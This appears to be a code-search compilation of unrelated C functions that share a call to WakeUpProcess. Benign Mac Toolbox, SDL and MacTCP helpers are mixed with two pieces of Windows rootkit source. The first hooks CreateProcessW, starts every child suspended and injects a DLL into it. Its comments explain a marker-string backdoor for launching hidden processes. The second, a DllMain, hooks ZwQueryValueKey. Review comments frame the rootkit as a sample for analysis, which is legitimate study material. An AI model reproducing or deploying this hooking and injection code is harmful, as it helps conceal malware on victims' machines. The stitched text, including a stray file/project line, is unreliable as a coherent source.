//		Rootkit hook installed over kernel32!CreateProcessW.
//		Every process created through it is started CREATE_SUSPENDED and has the
//		library at kNTIDllPath injected (InjectDll) before it runs, unless the
//		"backdoor" below opts it out.  Observable indicators in this code: the
//		OutputString messages "[!!] Hooked CreateProcessW" and
//		"Giving true sight to process".
//		NOTE(review): this is published rootkit sample code; the comments here
//		describe its behaviour for analysis and deliberately do not fix it.
//
//		Backdoor : if application name or command line contains RTK_FILE_CHAR
//		the created process is *not* hooked.
//		Useful to launch hidden process from windows gui/cmd.exe that performs
//		a search before delegating the creation of the process to CreateProcess
//		To launch a non hijacked process using cmd, do the following :
//		run:  cmd.exe
//		type: cmd.exe _nti			(where _nti is RTK_FILE_CHAR )
//		then run your hidden program from the non hijacked shell
//
//		Defects visible in this implementation (left as-is):
//		  - the caller's dwCreationFlags are discarded: CREATE_SUSPENDED is
//		    passed instead, so flags such as CREATE_NEW_CONSOLE are lost;
//		  - lpProcessInformation->hProcess / hThread are closed here although,
//		    per the CreateProcess contract, the caller owns and closes them;
//		  - the marker check only sees the first 255 bytes of each string after
//		    an ANSI (CP_ACP) conversion, so long or non-ANSI command lines may
//		    not match;
//		  - when both strings carry the marker, WakeUpProcess() runs twice.
//
//		Parameters/return: same contract as CreateProcessW (BOOL, nonzero on
//		success); lpProcessInformation is dereferenced whenever the underlying
//		call reports success.
BOOL WINAPI MyCreateProcessW(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, 
LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
{
	int bResult, bInject=1;
	char msg[1024], cmdline[256], appname[256];	// msg is cleared below but never used

	OutputString("[i] CreateProcessW()\n");

	// do not rely on info given by HijackApi() since we may have hijacked at GetProcAddress() level
	// Resolve the real CreateProcessW lazily through the saved fGetProcAddress
	// pointer; give up (return 0, i.e. failure) if that lookup fails.

	if(!fCreateProcessW) {
		fCreateProcessW = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"CreateProcessW");
		if(!fCreateProcessW) return 0;
	}


	my_memset(msg, 0, 1024);
	my_memset(cmdline, 0, 256);
	my_memset(appname, 0, 256);
	 //Convert strings from unicode :
	// Narrow copies (at most 255 bytes; the NUL comes from the memset above)
	// used only for logging and the RTK_FILE_CHAR check.  A NULL input should
	// leave the zeroed buffer untouched -- presumably, not shown here.
	WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpApplicationName, -1, appname, 255,NULL, NULL);
	WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpCommandLine, -1, cmdline, 255,NULL, NULL);
	OutputString("\n[!!] Hooked CreateProcessW : %s - %s, injecting rootkit (%s)...\n", (char*)appname, (char*)cmdline, (char*)kNTIDllPath);
	
	// Real call.  dwCreationFlags is replaced by CREATE_SUSPENDED so the child
	// cannot run before it is either injected or woken up below.
	bResult = (int) fCreateProcessW((const unsigned short *)lpApplicationName,
		(unsigned short *)lpCommandLine, lpProcessAttributes, lpThreadAttributes,
		bInheritHandles, CREATE_SUSPENDED /*dwCreationFlags*/, 
		lpEnvironment, (const unsigned short *)lpCurrentDirectory,	
		(struct _STARTUPINFOW *)lpStartupInfo, lpProcessInformation);
	
	// inject the created process if its name & command line doesn't contain RTK_FILE_CHAR
	if(bResult)
	{
		// Opt-out path: the marker was found, so the child is released
		// untouched.  WakeUpProcess (defined elsewhere) is presumably the
		// resume step for the suspended process -- confirm against its definition.
		if(lpCommandLine) {
			if(strstr((char*)cmdline,(char*)RTK_FILE_CHAR)){
				OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
				WakeUpProcess(lpProcessInformation->dwProcessId);
				bInject = 0;
			}
		}
		if(lpApplicationName) {
			if(strstr((char*)appname,(char*)RTK_FILE_CHAR)) {
				OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
				WakeUpProcess(lpProcessInformation->dwProcessId);
				bInject = 0;
			}
		}
		// Otherwise inject kNTIDllPath.  Whether InjectDll also resumes the
		// suspended child is not visible in this file.
		if(bInject) InjectDll(lpProcessInformation->hProcess, (char*)kNTIDllPath);

		// Closes handles the caller owns (see the header note above).
		CloseHandle(lpProcessInformation->hProcess);
		CloseHandle(lpProcessInformation->hThread); 
		
	}
	return bResult;
}
// Replace the contents of the static-text control `id` with `text` and
// redraw it right away.
//
// `text` must be NUL-terminated; its strlen() is handed to the control
// as the data length and no copy is made here.  After the redraw the
// current process is woken so the event loop repaints without waiting
// for the next event (the original author marked that as a hack).
void SetStaticText(int id, const char *text)
{
	ControlRef control = GetControl(id);
	size_t length = strlen(text);

	SetControlData(control, kControlNoPart, kControlStaticTextTextTag, length, text);
	DrawOneControl(control);

	// HACKY: nudge our own process so the event loop refreshes the display
	ProcessSerialNumber self = { 0, kCurrentProcess };
	WakeUpProcess(&self);
}
/* Time Manager task entry: wake the owning process, run the SDL alarm
 * callback, then re-arm the global timer record for the interval the
 * callback asks for (0 cancels the alarm).
 *
 * NOTE(review): Time Manager tasks presumably run at interrupt time, which
 * is why the process is woken first -- confirm before adding anything here.
 * Note that the task re-primed is gExtendedTimerRec.tmTask, not tmTaskPtr. */
pascal void TimerCallbackProc(TMTaskPtr tmTaskPtr)
{
	ExtendedTimerPtr timer = (ExtendedTimerPtr) tmTaskPtr;
	Uint32 next_ms;

	WakeUpProcess(&timer->taskPSN);

	next_ms = SDL_alarm_callback(SDL_alarm_interval);
	if (!next_ms) {
		/* Callback returned 0: stop the alarm. */
		SDL_alarm_interval = 0;
		return;
	}

	/* Round to the timer resolution and schedule the next firing. */
	SDL_alarm_interval = ROUND_RESOLUTION(next_ms);
	PrimeTime((QElemPtr)&gExtendedTimerRec.tmTask, SDL_alarm_interval);
}
// Queue a stream for polling in the event loop.
// May be called in interrupt.
//
// The stream's `qType` field doubles as an "already queued" flag: a stream
// already on `readyStreams` is left alone; otherwise it is marked, enqueued,
// and -- if a process serial number was recorded (`hasPSN`) -- the event
// loop is woken so it services the queue promptly.
//
// NOTE(review): the test-then-set on qType is not atomic.  If this can run
// concurrently with the dequeue side, confirm that a stream cannot be
// re-queued or dropped -- not verifiable from this file.
void StreamWait(Stream *stream)
{
	if (!stream->qType) {
		stream->qType = true;
		Enqueue((QElemPtr)stream, &readyStreams);

		if (hasPSN) {
			WakeUpProcess(&psn);
		}
	}
}
// DLL entry point.  On DLL_PROCESS_ATTACH it installs an in-process hook on
// ntdll!ZwQueryValueKey (redirecting it to MyZwQueryValueKey and storing the
// original in fZwQueryValueKey), reports the outcome via OutputDebugString,
// then calls WakeUpProcess(0).  All other reasons are ignored.  Always
// returns TRUE, even when the hook could not be installed.
//
// NOTE(review): this runs under the loader lock; HookApi and WakeUpProcess
// are project helpers whose safety there cannot be judged from this file,
// and the meaning of WakeUpProcess's 0 argument is not visible here.
BOOL WINAPI DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
	switch (ul_reason_for_call) {
	case DLL_PROCESS_ATTACH: {
		const int hooked = HookApi("ntdll.dll", "ZwQueryValueKey",
				(DWORD)&MyZwQueryValueKey, &fZwQueryValueKey) != 0;

		OutputDebugString(hooked ? "ZwQueryValueKey hook: OK.\n"
		                         : "ZwQueryValueKey hook: FAILED.\n");

		WakeUpProcess(0);
		break;
	}
	default:
		break;
	}

	return TRUE;
}
文件: bos_signon.c 项目: ModeenF/Caya
/* MacTCP asynchronous notification routine (ASR).  Every parameter is
 * ignored; the only effect is to wake the application identified by the
 * file-scope `psn` so its main loop gets a chance to service the stream.
 *
 * NOTE(review): ASRs are presumably invoked at interrupt time -- keep this
 * body to the single wake-up call. */
static pascal void
mactcp_asr(StreamPtr str, unsigned short event, Ptr cookie,
           unsigned short termin_reason, struct ICMPReport * icmp)
{
    (void) str;
    (void) event;
    (void) cookie;
    (void) termin_reason;
    (void) icmp;

    WakeUpProcess(&psn);
}